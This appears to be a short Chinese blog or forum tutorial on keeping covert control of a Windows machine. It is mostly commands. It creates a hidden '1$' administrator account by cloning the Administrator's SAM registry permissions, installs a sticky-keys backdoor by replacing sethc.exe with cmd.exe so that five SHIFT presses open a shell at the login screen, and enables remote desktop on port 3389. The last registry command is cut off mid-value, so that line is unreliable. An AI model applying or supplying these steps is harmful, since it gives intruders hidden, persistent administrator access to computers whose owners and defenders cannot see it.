Windows隐藏后门账号创建+SHIFT后门+远程桌面登录
net user 1$ 1 /add #创建一个用户名为1 密码为1的 隐藏账户(命令行下net user不可见)
net localgroupadministrators 1$ /add #将隐藏用户1$加入到管理员组
net user 1$ #查看该用户的权限
regedit 打开注册表并且赋予admin权限给SAM文件夹 否则无法展开子目录
接下来展开目录 找到并导出账号和权限 此处账号的权限值为3F2
将1$用户和3F2结尾的权限导出
1f4 为Administrator的权限文件 1$为用户的文件 1 为用户权限的文件
将Administrator的权限属性F值替换至隐藏账号的权限值 这样隐藏账号就拥有Administrator的权限了
net user 1$ /del #删除新建的隐藏账户
net user #查看当前有哪些用户 这里可以看到目前没有看到1$隐藏用户 并且在计算机管理里也没有看到隐藏用户的存在
net user 1$ #查看1$隐藏账户信息
此时在去除Administrator的SAM文件夹的查看权限
注销后 成功登录了创建的隐藏账号
五次SHIFT后门
takeown /f c:\windows\system32\*.* /a /r /d y #使用该命令获取文件夹的权限
cacls c:\windows\system32\*.* /T /E /G administrators:F #获取整个文件夹及其下面子目录文件的所属权
attrib -s -r -h sethc.exe
#+r或-r [文件名] 设置文件属性是否为只读
#+h或-h [文件名] 设置文件属性是否隐藏
#+s或-s [文件名] 设置文件属性是否为系统文件
copy cmd.exe sethc.exe #替换sethc这个文件为CMD命令行
在用户登录界面 连续五下SHIFT成功弹出CMD命令界面
开启3389端口进行远程登录
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSCo #在CMD执行该命令打开3389端口
成功通过MSTSC连上WIN7
@星旧学长